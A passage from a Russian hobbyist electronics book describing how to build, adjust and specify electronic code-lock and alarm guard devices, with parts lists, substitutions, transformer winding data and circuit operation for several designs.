выпрямительные диоды VD1—VD4 типа КД105, VD5 - VD8 — Д226; стабилитроны VD9 типа Д809, VDIO — Д814Г, VD11 — Д814Г; конденсаторы С1 типа МБМ-П-6308-0,1 мкФ, С2 — МБМ-П-бЗ0В-0,1 мкФ, СЗ — К50-6-16В-500 мкФ, С4 — К50-6-10В-100 мкФ, С7 — К10-17-25В-Н90-0.68 мкФ, С5 — К50-6-6.3В-20 мкФ, С6 — К10-17-25В-ПЗЗ-220 пФ; резисторы R1 типа МЛТ-2-6,8 Ом, R2 — МЛТ-0,25-3,9 кОм, R3 — МЛТ-0,25-100 Ом, R4 — МЛТ-0,25-750 Ом, R5 — МЛТ-0,5-220 Ом, R6 — МЛТ-1-2,2 кОм, R7 — МЛТ-0,125-1 кОм, R8 — МЛТ-0,125-22 кОм, R9 — МЛТ-0,125-5,6 кОм, R10 — МЛТ-0,125-100 кОм, R11—МЛТ-0,125-1 кОм, R12 — МЛТ-0,25-330 Ом, R13 — МЛТ-0,5-330 Ом, R14 — МЛТ-0,125-10 кОм; светодиод VD13 типа АЛ102А; электромагнитные реле К1 типа РЭС-10 (паспорт РС4.524.303) или РЭС-15 (паспорт РС4.591.003), К2 — РЭС-10 (паспорт РС4.524.302) или РЭС-15(паспорт РС4.591.004), КЗ — РКН (паспорт РС4.500.100);
индикаторная лампа H1 типа К6-60; плавкий предохранитель F1 типа ПМ-1-0.25А; сетевой понижающий трансформатор питания Т1 типа ШЛ броневой конструкции (ТН 17-127/220-50);
электрический соединитель X1 типа «вилка», смонтированный с электрическим кабелем; переключатели S1 типа П1Т-1-1, SB1 — МП-1; ХИТ GB1 типа 373 или 373А (6 шт).
При изготовлении электронного блока сторожевого устройства можно применить другие комплектующие ЭРИ и ЭРЭ. Например, резисторы типа МЛТ можно заменить на резисторы типов ОМЛТ, МТ, ВСа, ВС, C1-4, C2-8, УЛИ; конденсаторы типа К50-6 — на К50-3, К50-6А, К50-12, К50-16, К50-20, изменив способ их крепления на монтажной плате; выпрямительные диоды типа КД105 — на КД103А, КД109А, КД202А, Д105А, диоды типа Д226 — на Д226Г, Д226Д, КД109А; стабилитрон типа Д809 — на Д810, Д814Б, Д814В; транзистор типа КТ342А — на КТ342Б, КТ342В, КТ342Г, КТ301В, КТ312Б, КТ315В, КТ315Г, транзистор типа П214В — на П214А, П215Б, П215, П314Г; переключатель типа «тумблер» — на кнопочные типа П2К.
Налаживание и регулировка сторожевого устройства должны осуществляться последовательно. Все элементы схемы перед установкой на место должны быть проверены на соответствие требованиям ТУ и иметь параметры в пределах допусков, разрешенных ТД или указанных на схеме.
Регулировку и налаживание сторожевого устройства лучше всего осуществлять поблочно, при отключенной нагрузке. Сначала проверяется напряжение холостого хода на вторичных обмотках трансформатора питания Т1, затем — величина тока через стабилитрон VD11 подбором величины сопротивления резистора R5. Ток должен быть в пределах 16...22 мА. Далее подбором сопротивления резистора R1 устанавливают ток срабатывания защиты от перегрузок и коротких замыканий в выходных цепях электронного блока. Эту проверку производят при питании сторожевого устройства от сети переменного тока, при отключенном ХИТ. Иногда приходится заменять стабилитрон VD11 из-за разброса параметров, для того чтобы на выходе в точках А и Б действовало напряжение 9...10 В.
Проверка основной части электрической схемы сторожевого устройства осуществляется в собранном виде, при котором должен обеспечиваться заданный порядок срабатывания набранного шифра. Небольшая тренировка включения и своевременного выключения ИМ (стопора замка) в любом случае необходима для того, чтобы обеспечить его надежную эксплуатацию.
Важным условием долговечной работы сторожевого устройства является качественный электромонтаж проверенных ЭРИ и ЭРЭ. Пайку элементов необходимо выполнять оловянно-свинцовым припоем марки ПОС-40 или ПОС-60 паяльником мощностью не более 25 Вт.
Все комплектующие ЭРЭ основной принципиальной схемы устройства размещают на плате, изготовленной из односторонне фольгированного стеклотекстолита или гетинакса толщиной не менее 1,5 мм.
Проследим порядок открывания механизма замка сторожевого устройства при работе его от сети переменного тока и после установки кода 66112233, как указано на принципиальной схеме с перемычками между мультиплексором и дешифратором. В исходном состоянии при включенном электропитании все элементы счетно-решающего устройства подготовлены к работе и находятся в режиме ожидания. После нажатия на кнопку SB1 и замыкания ее контактов примерно через полсекунды должны произойти первое включение светодиода и передача импульса тока с выхода мультиплексора (вывод 6) ИМС DA6, на котором появляется высокий уровень логической единицы, на вход триггера ИМС DA2 (вывод 2). Заметим, что первый сигнал соответствует цифре 1, а правильно должна быть набрана цифра 6. Одновременно при включении светодиода на выходе счетчика ИМС DA3 (вывод 9) действует низкий уровень логического нуля, а при выключении здесь появляется высокий уровень логической единицы и открывается выход дешифратора ИМС DA5 (вывод 10).
Через 0,5 с произойдет второе зажигание светодиода, если кнопка переключателя SB1 оставалась в нажатом состоянии и ее контакты были замкнуты, появляется низкий уровень логического нуля на выходе дешифратора ИМС DA5 (но уже на выводе 11), и он останется открытым до третьего включения светодиода НL1. Затем через 0,5 с происходит третье включение, и так до шестого зажигания светодиода, перед которым становится открытым последующий выход ИМС DA5 (вывод 6), соединенный проволочной перемычкой с выводом 4 ИМС DA6, так как на нем действует низкий уровень логического нуля. Теперь на выходе ИМС DA6 (вывод 6) будет действовать также низкий уровень логического нуля, который переключит триггер ИМС DA1 (вывод 2) в исходное состояние, так как набрана правильная цифра 6 кода, и если в этот момент кнопку отпустить, то счетчик DA4 устанавливается в кодовое состояние, а в ИМС DA6 открывается следующий вход (вывод 3).
Следующая правильная цифра опять 6. Значит, набирая цифру 6, контакты переключающей кнопки SB1 необходимо разомкнуть в момент шестого вспыхивания светодиода HL1. Исполнительный механизм ЭМ1 сработает только после правильного набора всего восьмиразрядного кода в момент последнего выключения контактов переключателя SB1.
Конструктивно сторожевое устройство выполняется в виде функциональных узлов, заключенных в общий прямоугольный корпус с лицевой панелью, на которую выведены все основные ручки управления, предохранитель и индикаторы. Первый функциональный узел устройства представляет собой СИП, область применения которого может быть расширена, если выполнить его самостоятельной сборочной единицей. Значительный интерес для радиолюбителей может представлять БП, так как его можно использовать, например, для зарядки маломощных аккумуляторных батарей и элементов, для электропитания РЭА. Поэтому целесообразно на лицевую панель устройства вывести клеммы этого источника питания и в периоды между прямым выполнением функций использовать напряжение постоянного тока 9 и 5 В с общим выводом для питания различной бытовой аппаратуры и приборов.
Желательно также около всех элементов на лицевой панели сделать надписи, обозначающие их функциональные назначения. Лучше это делать гравировкой. На верхней крышке устройства необходимо предусмотреть вентиляционные отверстия, расположение и размеры которых определяются местом установки тепловыделяющих элементов на печатной плате и шасси: трансформатора питания Т1, выпрямительных диодов и регулирующего транзистора.
Электронный блок сторожевого устройства может быть установлен в любом месте охраняемого помещения, но обязательно на открытом и легкодоступном месте, где можно производить его техническое обслуживание. В не рабочем состоянии сторожевое устройство должно быть отключено от питающей сети, а механический стопор подвижного язычка замка установлен в положение, при котором обеспечивается свободное открывание замка обычным ключом.
При использовании устройства для многофункциональных целей в электрическую принципиальную схему должны быть внесены изменения в части включения в нее ИП, определяющих напряжение питания нагрузки и потребляемый этой нагрузкой постоянный ток. Это особенно важно при зарядке аккумуляторных батарей и элементов, при восстановлении и «лечении» различных ХИТ. В качестве ИП могут быть рекомендованы приборы 2-го класса точности типа М4200.
В устройстве можно применить электромагнит типа ЭКЗ-4-10, используемый в замках промышленного производства и устанавливаемый на входных дверях жилых помещений.
Основные электрические параметры и технические характеристики сторожевого устройства с однокнопочным управлением
Номинальное напряжение питающей сети переменного тока, В .................... 220 или 127
Номинальная частота питающей сети неременного тока, Гц .................... 50
Номинальные стабилизированные напряжения автономного источника питания, В:
для питания электронных цепей ........... 9
для питания ИМС .................... 5
Пределы изменения напряжения питающей сети
переменного тока, В .................... 180...240 или
110... 140
Пределы изменения частоты питающей сети
переменного тока, Гц.................... 49... 51
Коэффициент нелинейных искажений питающей сети
переменного тока, %, не более .............. 12
Пределы изменения напряжения постоянного тока, В.. 8... 12 и 4, 6... 6,1 Максимальная мощность, потребляемая устройством
от сети в режиме холостого хода, мВт ........ .12
Мощность, потребляемая устройством н рабочем
режиме эксплуатации, Вт, не более........... 15
Ток, потребляемый устройством н рабочем режиме,
мА, не более.......................... I50
Ток срабатывания защиты при коротком замыкании,
мА, не менее.......................... 170
Ток холостого хода, мА, не более.............. 8
Время срабатывания защитного устройства
от перегрузок с, не более ................ .0,1
Частота, вырабатываемая тактовым генератором
импульсов, Гц ........................ .2
Время между вспышками светодиода, с ........ .0,5
Число охраняемых объектов, шт .............. 1
Количество возможных сочетаний программируемого
кода устройства, шт .................... .40 320
Количество кодируемых цифр, шт ............ .8
Время готовности устройства к эксплуатации
после включения питания, мс .............. .0,2
Напряжение переменного тока на выводах
вторичных обмоток трансформатора, В:
7 и 8 . ............................ .6.3
9 и 10 ............................ .5
9 и 11............................ .6,3
12 и 13 ........................... .5
12 и 14 ........................... .6,3
Амплитуда пульсации выпрямленного напряжения
постоянного тока, мВ, не более:
5В .............................. .0,18
9В .............................. .0,12
Срок службы, ч, не менее ................. .8000
Вероятность безотказной работы устройства
при риске заказчика в=0,9, не менее ........ .0,98
Сопротивление изоляции токоведущих частей
устройства, МОм, не менее ................ 10
Помехозащищенность устройства при воздействии
внешнего электромагнитного поля, дБ, не менее . .100 кпд, %, не менее ....................... .90
Рис. 3.7. Принципиальная схема электронного сторожевого устройства с однокнопочным управлением.
3.4. ЭЛЕКТРОННОЕ СТОРОЖЕВОЕ УСТРОЙСТВО НА ШЕСТИ ИНТЕГРАЛЬНЫХ МИКРОСХЕМАХ
Высоконадежное сторожевое устройство, собранное на шести ИМС, относится к электронным устройствам средней сложности и разработано для применения в условиях УХЛ, ХЛ или В. Сторожевое устройство рассчитано на жесткие условия эксплуатации при температуре окружающей среды от —40 до 50 °С, относительной влажности воздуха до 95% при температуре 25 °С, при воздействии инея и росы и пониженного атмосферного давления воздуха до 5мм рт. ст.
Устройство может быть применено для установки как на внутренних, так и на наружных дверях жилых, производственных и хозяйственных помещений. Область его использования может быть расширена без значительных доработок для запирания дверей и въездных ворот гаражей, складских помещений и хозпостроек на садово-огородных участках. Надежность и долговечность устройства обеспечивается достаточно простым схемно-техническим решением и современным конструктивно-технологическим исполнением. Технологичность сторожевого устройства определяется оснащением радиолюбительской лаборатории необходимыми приборами и инструментами.
Электронная схема сторожевого устройства является по существу неотъемлемой частью системы охраны, в которую дополнительно входят механический замок врезной или накладной конструкции со стопором защелки, ИМ, приводимый в действие от электромагнита или соленоида или от электромеханического реле, и в ряде случаев устройство управления стопором защелки.
Работает сторожевое устройство от сети переменного тока напряжением 220 В частотой 50 Гц, ХИТ или другого источника электропитания постоянного тока, в том числе и собранного по рекомендациям, изложенным выше. Напряжение постоянного тока не превышает 12 В, номинальное напряжение — 9В.
Принципиальная электрическая схема сторожевого устройства на шести ИМС приведена на рис. 3.8. Как следует из схемы, устройство содержит в своем составе входные цепи с емкостным фильтром, защищающим от помех, которые проникают в сеть переменного тока; сетевой понижающий трансформатор питания Т1; выпрямитель нерегулируемого типа, работающий на емкостный фильтр; стабилизатор напряжения постоянного тока; кодирующее звено; счетно-решающее устройство с системой управления; ИМ дискретного действия.
Входное устройство обеспечивает подключение к сети переменного тока с помощью электрического соединителя X1 и сетевой розетки; предохранение первичных цепей устройства от перегрузок и коротких замыканий с помощью плавкого предохранителя F1, рассчитанного на максимальный ток 0,25А; общее отключение питания при нештатных ситуациях и включение устройства в эксплуатацию с помощью переключателя типа «тумблер» или П2К, — S1. На входе устройства собран емкостный фильтр на конденсаторах С1 и С'2, защищающий от низкочастотных помех, которые могут проникнуть в сеть питания.
В качестве сетевого понижающего трансформатора питания Т1 в сторожевом устройстве может быть использован унифицированный трансформатор типа ТН, габаритная мощность которого равна 20 Вт. Конструкция покупного трансформатора обеспечивает повышенный уровень влагозащищенности и электрической прочности. Соединения выводов обмоток трансформатора при подключении к сети переменного тока даны в табл. 3.9.
Таблица 3.9. Соединения выводов обмоток сетевого понижающего трансформатора питания Т1
В устройстве может быть применен самодельный трансформатор питания, рассчитанный на подключение к сети переменного тока напряжением только 220 В и изготовленный по упрощенной схеме, с одной первичной и двумя вторичными обмотками, одна из которых имеет отвод от средней точки. Моточные данные самодельного трансформатора приведены в табл.3.10. Трансформатор питания изготавливается с одной катушкой на броневом магнитопроводе типа УШ (Ш или ШЛ). В конструкции может быть использован также магнитопровод с размерами, позволяющими уменьшить расход меди, типа ШЛМ. Активная площадь поперечного сечения стали центрального стержня магнитопровода должна быть не менее 6 см2.
Таблица 3. 10. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электронном сторожевом устройстве на шести интегральных микросхемах
Намотка провода на катушку должна осуществляться рядовым способом, виток к витку, с изоляцией каждого слоя и пропиткой нитролаками. Между первичной и вторичными обмотками делается усиленная изоляция и наматывается слой обмоточного провода, один вывод которого замыкается на магнитопровод. Слой обмоточного провода является экраном. Самодельный трансформатор рекомендуется закрыть металлическим кожухом, изготавливаемым из жести или электротехнической стали и дополнительно защищающим обмоточный провод катушки.
Понижающий трансформатор питания обеспечивает полную гальваническую развязку вторичных цепей электронной схемы от сети переменного тока высокого напряжения, заданные значения выпрямленного напряжения постоянного тока, достаточно безопасную регулировку устройства, так как на выходе действует пониженное напряжение.
Выпрямительное устройство собрано на двух маломощных диодах по двухполупериодной схеме со средним выводом вторичной обмотки, которая чаще применяется в маломощных БП. По сравнению с однофазной мостовой схемой она позволяет уменьшить вдвое число диодов и тем самым понизить потери. Выпрямители, собранные по этой схеме, характеризуются повышенной частотой пульсации, возможностью использования вентилей с общим катодом (или анодом), что упрощает их установку на общем радиаторе, а также повышенным обратным напряжением на комплекте выпрямительных диодов и более сложной конструкцией трансформатора. Работает выпрямитель на емкостный фильтр, выполненный на конденсаторе С5. Схема выпрямителя позволяет получить на выходе напряжение питания с высокими техническими параметрами, обеспечивающими точное срабатывание системы защиты и четкую работу схемы сторожевого устройства. Выпрямленное напряжение поступает на полупроводниковый стабилизатор с защитой от перегрузок и коротких замыканий в цепях сторожевого устройства.
Включенный на входе устройства плавкий предохранитель F1 не всегда надежно защищает устройство от перегрузок и коротких замыканий, которые наиболее часто возникают из-за ошибок, допускаемых начинающими радиолюбителями и юными техниками. Для повышения надежности работы сторожевого устройства в БП введена электронная защита, которая собрана на стабилитроне VD3, транзисторе VT1 и резисторах R1 и R3. Работает защитное устройство следующим образом. На выходе выпрямителя включен проволочный резистор R3, через который протекает ток нагрузки и на котором падает небольшое напряжение, управляющее работой транзистора VT1. Заметим, что напряжение на этом транзисторе стабилизировано полупроводниковым стабилитроном VD3, включенным в прямом направлении. Ток нагрузки, протекающий через резистор R3, действует между базой и эмиттером, и разность напряжений между ними определяет состояние этого транзистора. Если ток нагрузки ниже допустимого, который определяется параметрами ЭРЭ, то транзистор остается закрытым. Когда же ток нагрузки резко увеличивается и превышает допустимый, падение напряжения на резисторе R3 становится таким, что транзистор VT1 открывается. При этом параллельно переходу база — коллектор включенный стабилитрон VD4 фактически шунтируется, так как через этот переход ответвляется часть электрического тока, а это приводит к ограничению тока, протекающего через регулирующий транзистор VT3 стабилизатора напряжения. В результате напряжение на нагрузку не поступает и сторожевое устройство обесточивается. Защитное устройство можно настроить на ток срабатывания 300 мА и более.
Важнейшим условием четкой работы сторожевого устройства и электронной схемы является использование проверенных и абсолютно исправных комплектующих ЭРИ и ЭРЭ, а также технологически правильного монтажа микросхем на печатной плате. При монтаже должен использоваться только низковольтный маломощный паяльник с тонким жалом и регулируемой температурой нагрева. В общем случае существующие правила формовки выводов и установки ИМС в электромонтажной схеме могут быть определены следующим образом:
1. Длина выводов ИМС должна быть не менее 15 мм после подрезки и формовки в соответствии с ТУ.
2. Использование высокотемпературных припоев не допускается.
3. При припайке каждого вывода ИМС должен использоваться металлический теплоотвод (в обычном случае это пинцет).
4. Время нагрева отдельных выводов ИМС при пайке не должно превышать 1...2 с.
5. Места на печатной плате перед установкой ИМС должны быть тщательно подготовлены.
6. Демонтаж ИМС допускается не более двух раз. Следует отметить, что только правильное соединение элементов схемы, и особенно шифровального устройства, позволит работать сторожевому устройству без сбоев.
Кодирование устройства осуществляется методом установления перемычек между выводами выходных контактов ИМС DA5 и DA6, образующих мультиплексор. Так как конструкция сторожевого устройства не сопровождается комплектом КД и ТД и полностью зависит от выполнения рекомендаций и возможностей радиолюбителя, а также от материального оснащения домашней мастерской, то необходимо наиболее удобно сконструировать и изготовить узел кодировочного поля. Наиболее целесообразно использовать такие элементы, как унифицированные малогабаритные зажимы или приборные контакты с пружинными и винтовыми зажимами. Эти контакты удобно расположить на лицевой панели сторожевого устройства, в котором собрана электронная схема. Монтаж ЭРИ и ЭРЭ осуществляется комбинированным способом с применением печатного и объемного монтажа. Печатная плата изготавливается из односторонне фольгированного стеклотекстолита или гетинакса толщиной 1,5..2 мм.
Как следует из схемы, набор шифра сторожевого устройства осуществляется на шифровальном поле соединением контактов А1—А8 с контактами Б1—Б8 в комбинациях любых цифр от 1 до 8. Восьмиразрядный код позволяет получить более 40000 сочетаний кода, который набрать простым перебором цифр практически не представляется возможным. Шифр выполняется установлением перемычек между выводами ИМС. Для правильного набора кода необходимо одну из двух линеек с контактными зажимами обозначить цифрами, которые и определяют не только восьмиразрядный код, но и порядок счета при замыкании контактов переключателя SB1.
Если соединить контакты А1 с Б2, А2 с Б1, A3 с БЗ, A3 с Б4, А6 с Б5, А7 с Б6, А7 с Б7, А8 с Б8, то закодированное число шифра будет 12336778.
В основном электронном блоке можно выделить следующие функциональные элементы: на двух ИМС DA5 и DA6 собран мультиплексор; счетчик-дешифратор собран на ИМС DA4; тактовый генератор выполнен на ИМС DA1 (выводы 1, 2, 3 и 11, 12, 13); счетчик выполнен на ИМС DA3; определитель типа И собран на диодах VD7—VD14 и резисторе R16 и имеет восемь разрядов.
Порядок считывания цифр кода производится автоматически с контактов, которые смонтированы на шифровальной планке Б, цифры кода задаются вручную подключением перемычек с шифровальной планки А. Например, если код имеет вид 55555555, то необходимо контакты А5 соединить последовательно со всеми контактами планки Б.
Для изготовления сторожевого устройства использованы следующие покупные комплектующие ЭРИ и ЭРЭ: ИМС DA1 типа К176ЛА7, DA2 — К176ЛЕ5, DA3 — К176ИЕ8, DA4 — К176ИЕ8, DA5 — К176ЛА7, DA6 — К176ЛА7; транзисторы VT1 типа МП42, VT2 — МП42, VT3 — П213, VT4 — КТ315Б VT5 — КТ315Б, VT6 — КТ814А; диоды VD1 типа Д226Д, VD2 — Д226Д, VD6 — Д226Е, VD7—VD14 — КД513А; стабилитроны VD3 типа Д814Д, VD4 — Д814Д; светодиод VD5 типа АЛ102А;
конденсаторы С1 типа МБМ-11-750В-0.025 мкФ, С2 — МБМ-П-750В-0.025 мкФ, СЗ — К42У-2-160В-2200 пФ, С4 — К10-7В-50В-Н30-2200 пФ, С5 — К50-6-25В-500 мкФ, С6 — К50-6-25В-500 мкФ, С7 - К10-17-50В-22 пФ, С8 — К73-17-63В-0, 1 мкФ, С9 — К10-17-50В-1000 пФ, С10 — КМ-6-25В-0,033 мкФ, С11— КМ-6-25В-0,033 мкФ; резисторы R1 типа ВСа-0,5-620 Ом, R2 — ВСа-0,25-750 Ом, R3 — проволочный самодельный 3 Ом (намотанный на резисторе ВСа-2-10 Ом константановым или нихромовым проводом), R4 — ВСа-0,5-1,2 кОм, R5 СП4-1-0,5Вт-А-2,2 кОм, R6 — ВСа-0.5-4,3 кОм, R7 — ВСа-0.5-2,4 кОм, R8 — ВСа-2-10 к0м,R9-ВСа-0,125-10кОм, R10-Bса-0,125-3,0МОм,R11— ВСа-0,125-100 кОм, R12 — ВСа-0,12-100 кОм, R13 — ВСа-0,5-330 Ом, R14 -ВСа-0,125-47 кОм, R15 - ВСа-0,25-1,2 кОм, R16 -ВСа-0,25-100 кОм; сетевой понижающий трансформатор питания T1типа ТН 14-127/220-50; электрический соединитель X1 типа «вилка»; предохранитель плавкий F1 типа ПМ-1-0,25 А;
лампа индикаторная H1 типа МН-6,3-0,22 А; переключатели SI типа «тумблер» ТВ2-1-2, SB1 — КМ1-1; ИМ К1 (электромагнит или электромагнитное реле типа РКН).
Раскодирование и подача команды на срабатывание ИМ сторожевого устройства производится с помощью правильного набора кода при замыкании контактов переключателя SB1. При нажатии на кнопку этого переключателя начинает работать счетчик импульсов и вспыхивать светодиод VD5. Если нужно набрать, например, код, состоящий из цифр 57331844, то для набора первой цифры светодиод должен вспыхнуть пять раз, после чего кнопка переключателя SB1 должна быть отпущена. При следующем нажатии на кнопку светодиод должен вспыхнуть семь раз и кнопка вновь должна быть отпущена. Таким образом набираются все восемь цифр кода. Если все цифры кода будут набраны правильно, то последним откроется транзистор VT6 и сработает исполнительное реле К.1.
При регулировке сторожевого устройства можно использовать другие аналогичные ЭРИ и ЭРЭ, не ухудшающие его основные электрические параметры и технические характеристики. Например, вместо стабилитрона типа Д814Д можно использовать любой стабилитрон из серий Д808—Д814. Резистор R3 можно намотать проводом с высоким удельным сопротивлением на корпусе перегоревшего предохранителя. Вместо резисторов типа ВСа можно использовать резисторы типов МТ, МЛТ, ОМЛТ, C1-4, C2-11, БЛП, БЛПа. В качестве ИМ можно использовать электромагнит или соленоид, описание которых приведено выше, а также электромагнитные реле типа РЭН-18 (паспорт РХ4.564.706), РКН (паспорт РС4.500.100), РСМ (паспорт РФ4.500.031). Налаживание сторожевого устройства начинается с БП. Сначала проверяется действующее напряжение на выходных обмотках сетевого трансформатора Т1, затем — на выходе выпрямителя и стабилизатора напряжения в точках А и Б. Здесь напряжение постоянного тока должно быть в пределах 8,5...12 В. Эту проверку рекомендуется выполнять при отключенной в точках А и Б нагрузке. После данной проверки устанавливается ток срабатывания защиты от перегрузок и коротких замыканий. Налаживание защиты сводится к подбору сопротивления резистора R3 — его сопротивление должно быть таким, чтобы защита срабатывала при токе нагрузки 350 мА.
В электронном блоке сторожевого устройства производится подбор резисторов усилителя тока ИМ (R9, R13) для обеспечения необходимого тока срабатывания.
Основные электрические параметры и технические характеристики электронного сторожевого устройства на шести микросхемах
Номинальное напряжение питающей сети
переменного тока, В .................... .220 или 127
Номинальная частота питающей сети
переменного тока, Гц ................... .50
Номинальное напряжение автономного источника
электропитания постоянного тока, подключаемого
в точках А и Б, В ..................... .9
Пределы изменения напряжения питающей сети
переменного тока, В .................... .180...242 или
110...140 Пределы изменения частоты питающей сети
переменного тока, Гц ................... .49...51
Пределы изменения напряжения электропитания
постоянного тока автономного источника, В .... .8,5...12 Коэффициент нелинейных искажений питающей сети
переменного тока, %, не более .............. .12
Амплитуда пульсации выпрямленного напряжения
постоянного тока на выходе выпрямителя, мВ,
не более ............................ .20
Коэффициент стабилизации, не менее .......... .100
Длительность вспышек светодиода при наборе кода
и замкнутых контактах переключателя SB1, с,
не менее ............................ .0,5
Вероятность подбора кода, не менее ........... .10^(-8)
Номинальное количество цифр в коде .......... .8
Разрядность счетчика импульсов .............. .8
Максимальная мощность, потребляемая устройством
от сети,Вт ........................... 18
Ток, потребляемый устройством в рабочем
режиме, мА, не более ................... .300
Ток срабатывания защиты при перегрузках
и коротких замыканиях, мА, не менее......... 350
Время срабатывания защиты при коротком
замыкании ,с, не более ................... .0,1
Ток холостого хода, мА, не более .............. 10
Рабочая частота, вырабатываемая тактовым
генератором импульсов. Гц ............... .2
Время между вспышками светодиода при замкнутых
контактах переключателя SB1, с ........... . .0,5...1
Число одновременно охраняемых объектов, шт .... .1
Готовность устройства к эксплуатации
после включения напряжения, мс, не более ..... .0,5
Вероятность безотказной работы сторожевого устройств при риске заказчика в=0,92, не менее .... .0,97
Срок службы, ч, не менее .................. 10 000
Сопротивление изоляции токоведущих частей
устройства, МОм, не менее ................ 10
Помехозащищенность устройства при воздействии
внешнего электромагнитного поля, дБ, не менее . .100 кпд, %, не менее ....................... .95
Условия эксплуатации:
температура окружающей среды, °С ........ .—40...+50
относительная влажность воздуха при температуре 25 С, %, не более .................. .93±2
атмосферное давление воздуха, мм рт. ст. .... .200...1000
Рис. 3. 8. Принципиальная схема электронного сторожевого устройства на шести интегральных микросхемах.
3.5. СТОРОЖЕВОЕ УСТРОЙСТВО НА ППП СО СВЕТОВОЙ И ЗВУКОВОЙ СИГНАЛИЗАЦИЕЙ
Сторожевое устройство на полупроводниках разработано для охраны объектов народно-хозяйственного назначения, дачных строений, хозблоков на садово-огородных участках, гаражей, жилых помещений в условиях УХЛ, ХЛ и В, при установке исполнительных механизмов на входных дверях, окнах, воротах и по периметру ограждений, которые рассчитаны на эксплуатацию как внутри объектов, так и на открытых площадях. Радиолюбителям необходимо так сконструировать сторожевое устройство, чтобы была обеспечена высокая технологичность изготовления и устройство могло бы противостоять разнообразным внешним воздействующим нагрузкам. Изделия промышленного изготовления устойчиво работают при смене температур и повышенной относительной влажности до 95%, а также при пониженном атмосферном давлении до 5 мм рт. ст. Такие условия эксплуатации обеспечиваются высоким качеством применяемых комплектующих ЭРИ и ЭРЭ и достаточно простым схемно-техническим решением.
Работает сторожевое устройство от сети переменного тока напряжением 220 В частотой 50Гц.Электронная схема данного устройства допускает электропитание от вторичного источника питания напряжением 16...24 В.
Область применения этого сторожевого устройства может быть значительно расширена, если внести некоторые изменения в схему питания и использовать его для охраны подвижных большегрузных средств, работающих на суше и на воде (реках, озерах и морях). Но лучшее применение — все-таки для охраны стационарных объектов на приусадебных участках.
Принципиальная электрическая схема устройства, собранного на ППП со световой и звуковой сигнализацией, приведена на рис. 3.9.
Сторожевое устройство представляет собой совокупность нескольких функциональных узлов и блоков, объединенных в универсальную охранную систему. Как видно из электрической схемы, она состоит из входных электрических цепей, сетевого понижающего трансформатора питания Т1, выпрямительного устройства, работающего на емкостный фильтр, стабилизатора напряжения, быстродействующего электронного блока охранной сигнализации и выходных цепей с исполнительными устройствами автоматического действия.
Подключается устройство к сети переменного тока с помощью стандартного электрического соединителя X1 типа «вилка», которая в свою очередь подключается к штепсельной розетке. На входе устройства установлен плавкий предохранитель F1, защищающий ЭРЭ входных цепей от перегрузок и коротких замыканий. Предохранитель рассчитан на максимальный ток срабатывания 0,25 А. Включение и выключение охранной сигнализации обеспечивается однополюсным переключателем S1 типа «тумблер». Включенный параллельно первичной обмотке сетевого трансформатора, высоковольтный конденсатор С1 защищает систему электронной сигнализации от сетевых помех.
В качестве сетевого понижающего трансформатора питания Т1 применен унифицированный трансформатор типа ТА, который может быть заменен трансформатором самодельной конструкции. Можно применить трансформатор типоразмера ТА62-127/220-50 с двумя первичными и шестью вторичными обмотками. Самодельный трансформатор изготавливается на броневом магнитопроводе типа Ш или ШЛ (ШЛМ) из электротехнической стали марки 3312. Активная площадь поперечного сечения стали основного стержня магнитопровода должна быть в пределах 5...6 см2 Следует заметить, что чем больше активная площадь поперечного сечения стали, тем больше габаритная мощность трансформатора. Моточные данные самодельного трансформатора Т1 приведены в табл. 3.11. При изготовлении этого трансформатора можно намотать на каркас катушки только действующие обмотки, не повторяя конструкцию унифицированного трансформатора. На каркас катушки наматывается одна первичная и две вторичные обмотки, между которыми укладывается через изоляционные прокладки один ряд обмоточного провода виток к витку, выполняющего роль экрана, который обеспечит защиту выходных цепей от электромагнитных помех. Один конец экранного провода заземляется на магнитопровод.
Таблица 3.11. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в сторожевом устройстве на ППП со световой и звуковой сигнализацией
Согласно схеме, для подключения выпрямителя используются две обмотки сетевого трансформатора Т1 с выводами 19 и 20, 21 и 22. Выводы обмоток 20 и 21 соединяются между собой, а однофазная двухполупериодная схема выпрямителя подключается к выводам 19 и 22, на которых действует переменное напряжение 22 В. Коэффициент трансформации при этом равен 10. При включении унифицированного трансформатора в сеть переменного тока напряжением 220 В выводы 2 и 6 соединяются между собой, а напряжение питания электрической сети подается на выводы 1 и 8. Если в сторожевом устройстве будет применен другой трансформатор, например серии ТПП или ТС, то подключение его к сети должно осуществляться согласно схеме этого трансформатора.
При изготовлении трансформатора необходимо особое внимание уделить укладке обмоточного провода, которая должна быть рядовой, виток к витку, без накладок и перехлестов и с обязательной изоляцией каждого слоя нитролаком и тонкой фторопластовой пленкой с большим электрическим сопротивлением, можно также конденсаторной бумагой. Второй и последующие слои наматываются также рядами с выводом концов обмоточного провода через боковую стенку каркаса катушки в одну сторону. После сборки трансформатор должен быть закрыт защитным кожухом.
Выпрямительное устройство состоит из четырех полупроводниковых диодов и конденсаторов С1—С4. Конденсатор С1, как было указано выше, защищает устройство от сетевых помех, С2 сглаживает пульсации выпрямленного напряжения постоянного тока, СЗ обеспечивает снижение шума ППП, а С4, установленный на выходе стабилизатора напряжения и включенный параллельно нагрузке, снижает выходное сопротивление источника питания по переменному току.
В схеме электропитания на выходе выпрямителя собран стабилизатор напряжения компенсационного типа, выполненный на транзисторах VT1—VT4 и стабилитроне VD5. Регулирующим элементом стабилизатора является транзистор VT3. Опорное напряжение снимается со стабилизатора, выполненного по параметрической схеме на транзисторе VT1 и стабилитроне VD5, при этом транзистор является стабилизатором тока. Величина опорного напряжения при работе стабилизаторов сравнивается с выходным напряжением, которое снимается с резисторного ДН, собранного на постоянных резисторах R5, R6. Транзисторы VT2 и VT4 образуют дифференциальный усилитель тока. При сравнении токов опорного и выходного напряжений, которое осуществляется дифференциальным усилителем, через транзистор VT3 протекает ток, равный разности этих напряжений. Последовательно включенный стабилитрону VD5 резистор R1 обеспечивает четкий запуск компенсационного стабилизатора, когда в момент включения напряжение на выходе равно нулю.
После подачи сетевого напряжения на устройство в работу включается система электропитания, а сторожевые цепи электронной схемы переходят в дежурный режим.
Сторожевое устройство представляет собой быстродействующую систему, которая срабатывает, как и большинство подобных систем, как при замыкании контактов конечных выключателей или датчиков, так и при обрыве охранной линии.
В зависимости от выбранной конструкции устройства питание системы может обеспечиваться от автономного источника тока.
